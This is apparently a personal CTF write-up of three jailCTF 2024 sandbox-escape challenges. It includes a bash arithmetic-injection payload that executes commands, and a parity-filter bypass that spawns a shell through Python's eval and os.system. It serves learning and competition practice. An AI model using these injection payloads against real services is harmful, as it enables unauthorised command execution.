jailCTF 2024 | blind-calc, filter'd, parity 1 (Jail)

some easy jail challenges that I solved

JailCTF was a really good ctf, I couldn't play much but I had much fun, in the end I managed to only solve 3 tasks that were very easy

blind-calc :

this is a pretty easy task, it's a calculator coded in bash, we don't have access to the code so we have to guess.

We don't have to guess much since if you stumble upon this link you can find an payload to do a bash injection for arithmetic operations.

so our payload would just be :

x[$(<command> > /proc/$$/fd/1)]

pretty straightforward.

filter'd :

#!/usr/local/bin/python3
M = 14  # no malicious code could ever be executed since this limit is so low, right?
def f(code):
    print (str(M))
    assert len(code) <= M
    assert all(ord(c) < 128 for c in code)
    assert all(q not in code for q in ["exec", 
"eval", "breakpoint", "help", "license", "exit"
, "quit"])
    exec(code, globals())
    
f(input("> "))

this challenge is also an easy one, the hard part is to bypass the length limit on it, we can assign the input function to a variable to decrease the number of characters used, so in that sense we can just exploit it in this way.

Parity 1 :

#!/usr/local/bin/python3
inp = input("> ")

for i, v in enumerate(inp):
    if not (ord(v) < 128 and i % 2 == ord(v) % 2):
        print('bad')
        exit()

eval(inp)

For this challenge we would just need to match the parity of the character with the parity of its index, eval can be reused at it matches that condition and I made a script to test my string if they pass that condition and which characters need to be corrected :

x = input()
for v in x:
    print (ord(v)%2)

for i, v in enumerate(x):
    if not (ord(v) < 128 and i % 2 == ord(v) % 2):
        print('bad : '+v+" "+ str(i))
        exit()

we can use this payload and try to convert it to something usable using concatenation and whitespaces :

eval(__import__('os').system('sh'))

After some work we are left with this :

 eval	(	"_"+"_"+"i"+"m"+ 'por' + 't' +"_"+"_"+ '(' +"'"+"o"+"s"+"'"+")"+ '.' +"s"+"y"+"s"+ 't' +"e"+"m"+ '(' +"'"+"s"+ 'h' +"'"+")")

the first space is important as its ord is pair and the first index is 0 so they would need to match.

in the end I only solved 3 challenges but they were fun, if I had more time I would've solved more but in the end the CTF was very fun and a first in it's type, can't wait for next year.